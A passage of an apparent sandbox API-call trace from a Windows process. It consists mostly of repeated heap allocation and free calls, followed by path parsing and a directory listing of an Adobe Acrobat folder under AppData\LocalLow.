hHeap=0x660000) returned 1 [0060.686] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8830 | out: hHeap=0x660000) returned 1 [0060.686] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8830 [0060.686] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.686] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc2e) returned 0x9c778e8 [0060.686] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.687] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0060.687] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8830 | out: hHeap=0x660000) returned 1 [0060.687] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8830 [0060.687] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0060.687] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0060.687] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8830 | out: hHeap=0x660000) returned 1 [0060.687] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8830 [0060.687] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0060.687] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0060.687] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8830 | out: hHeap=0x660000) returned 1 [0060.687] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8830 [0060.687] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.687] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.687] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8830 | out: hHeap=0x660000) returned 1 [0060.687] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8830 [0060.687] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.687] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.687] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8830 | out: hHeap=0x660000) returned 1 [0060.687] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8830 [0060.687] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.687] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x9c778e8 [0060.687] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.687] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0060.687] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8830 | out: hHeap=0x660000) returned 1 [0060.687] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8830 [0060.687] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0060.687] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.687] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8830 | out: hHeap=0x660000) returned 1 [0060.687] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8830 [0060.687] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0060.687] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.687] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8830 | out: hHeap=0x660000) returned 1 [0060.687] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8830 [0060.687] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.688] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.688] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8830 | out: hHeap=0x660000) returned 1 [0060.688] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8830 [0060.688] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.688] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.688] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8830 | out: hHeap=0x660000) returned 1 [0060.688] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8830 [0060.688] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.688] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.688] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8830 | out: hHeap=0x660000) returned 1 [0060.688] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8830 [0060.688] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.688] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.688] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8830 | out: hHeap=0x660000) returned 1 [0060.688] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8830 [0060.688] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.688] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.688] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8830 | out: hHeap=0x660000) returned 1 [0060.688] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8830 [0060.688] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.688] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.688] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8830 | out: hHeap=0x660000) returned 1 [0060.688] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8830 [0060.688] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.688] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.688] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8830 | out: hHeap=0x660000) returned 1 [0060.688] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8830 [0060.688] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.688] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x9c778e8 [0060.688] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.688] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0060.688] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8830 | out: hHeap=0x660000) returned 1 [0060.688] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8830 [0060.688] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.689] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.689] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8830 | out: hHeap=0x660000) returned 1 [0060.689] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8830 [0060.689] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0060.689] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0060.689] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8830 | out: hHeap=0x660000) returned 1 [0060.689] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8830 [0060.689] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0060.689] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0060.689] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8830 | out: hHeap=0x660000) returned 1 [0060.689] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8830 [0060.689] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.689] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.689] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8830 | out: hHeap=0x660000) returned 1 [0060.689] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8830 [0060.689] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.689] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.689] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8830 | out: hHeap=0x660000) returned 1 [0060.689] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8830 [0060.689] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.689] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x9c778e8 [0060.689] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.689] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0060.689] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8830 | out: hHeap=0x660000) returned 1 [0060.689] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8830 [0060.689] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0060.689] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.689] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8830 | out: hHeap=0x660000) returned 1 [0060.689] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8830 [0060.689] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0060.689] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.689] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8830 | out: hHeap=0x660000) returned 1 [0060.689] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8830 [0060.689] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.689] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.690] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8830 | out: hHeap=0x660000) returned 1 [0060.690] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8830 [0060.690] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.690] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.690] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8830 | out: hHeap=0x660000) returned 1 [0060.690] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8830 [0060.690] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.690] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.690] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8830 | out: hHeap=0x660000) returned 1 [0060.690] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8830 [0060.690] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.690] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.690] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8830 | out: hHeap=0x660000) returned 1 [0060.690] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8830 [0060.690] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.690] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.690] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8830 | out: hHeap=0x660000) returned 1 [0060.690] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8830 [0060.690] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.690] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.690] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8830 | out: hHeap=0x660000) returned 1 [0060.690] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8830 [0060.690] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.690] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.690] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8830 | out: hHeap=0x660000) returned 1 [0060.690] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8830 [0060.690] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.690] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x9c778e8 [0060.690] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.690] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0060.690] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8830 | out: hHeap=0x660000) returned 1 [0060.690] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8830 [0060.690] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.691] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.691] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8830 | out: hHeap=0x660000) returned 1 [0060.691] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8830 [0060.691] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0060.691] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0060.691] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8830 | out: hHeap=0x660000) returned 1 [0060.691] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8830 [0060.691] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0060.691] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0060.691] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8830 | out: hHeap=0x660000) returned 1 [0060.691] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8830 [0060.691] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.691] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.691] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8830 | out: hHeap=0x660000) returned 1 [0060.691] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8830 [0060.691] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.691] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.691] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8830 | out: hHeap=0x660000) returned 1 [0060.691] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8830 [0060.691] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.691] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x9c778e8 [0060.691] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.691] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0060.691] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8830 | out: hHeap=0x660000) returned 1 [0060.691] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8830 [0060.691] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0060.691] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.691] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8830 | out: hHeap=0x660000) returned 1 [0060.691] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8830 [0060.691] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.691] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.691] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8830 | out: hHeap=0x660000) returned 1 [0060.691] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8830 [0060.691] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.692] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.692] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8830 | out: hHeap=0x660000) returned 1 [0060.692] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8830 [0060.692] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.692] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.692] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8830 | out: hHeap=0x660000) returned 1 [0060.692] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8830 [0060.692] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.692] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.692] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8830 | out: hHeap=0x660000) returned 1 [0060.692] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8830 [0060.692] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.692] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.692] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8830 | out: hHeap=0x660000) returned 1 [0060.692] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8830 [0060.692] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\") returned="Acrobat\\" [0060.692] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e3b0 [0060.692] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32699a0 [0060.692] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8830 | out: hHeap=0x660000) returned 1 [0060.692] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\") returned="Adobe\\" [0060.692] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329bba0 [0060.692] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32699a0 | out: hHeap=0x660000) returned 1 [0060.692] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0060.692] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x50) returned 0x3261528 [0060.692] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329bba0 | out: hHeap=0x660000) returned 1 [0060.692] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0060.692] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x9c89910 [0060.692] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3261528 | out: hHeap=0x660000) returned 1 [0060.692] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0060.692] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x32575c0 [0060.692] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0060.692] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e3b0 [0060.692] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c89910 | out: hHeap=0x660000) returned 1 [0060.692] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0060.693] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0060.693] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0060.693] PathFindFileNameW (pszPath="") returned="" [0060.693] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8830 [0060.693] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\*", lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd6e27e0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd6e27e0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd6e27e0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x68d798 [0060.693] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8830 | out: hHeap=0x660000) returned 1 [0060.693] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd6e27e0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd6e27e0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd6e27e0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0060.693] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd6e27e0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xe5b04330, ftLastAccessTime.dwHighDateTime=0x1d35d05, ftLastWriteTime.dwLowDateTime=0xe5b04330, ftLastWriteTime.dwHighDateTime=0x1d35d05, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="10.0", cAlternateFileName="")) returned 1 [0060.693] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adbb0 [0060.693] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32ade10 [0060.693] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1c) returned 0x328e3b0 [0060.693] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adfd8 [0060.693] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32ade10 | out: hHeap=0x660000) returned 1 [0060.693] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adbb0 | out: hHeap=0x660000) returned 1 [0060.693] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd6e27e0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xe5b04330, ftLastAccessTime.dwHighDateTime=0x1d35d05, ftLastWriteTime.dwLowDateTime=0xe5b04330, ftLastWriteTime.dwHighDateTime=0x1d35d05, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="10.0", cAlternateFileName="")) returned 0 [0060.693] FindClose (in: hFindFile=0x68d798 | out: hFindFile=0x68d798) returned 1 [0060.693] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32575c0 | out: hHeap=0x660000) returned 1 [0060.693] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b87a8 | out: hHeap=0x660000) returned 1 [0060.693] PeekMessageW (in: lpMsg=0x9f4ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4ff08) returned 0 [0060.693] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adbb0 [0060.693] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 